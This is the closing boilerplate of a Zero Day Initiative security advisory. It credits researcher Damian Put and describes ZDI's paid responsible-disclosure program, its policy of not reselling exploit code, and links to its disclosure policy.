Damian Put -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi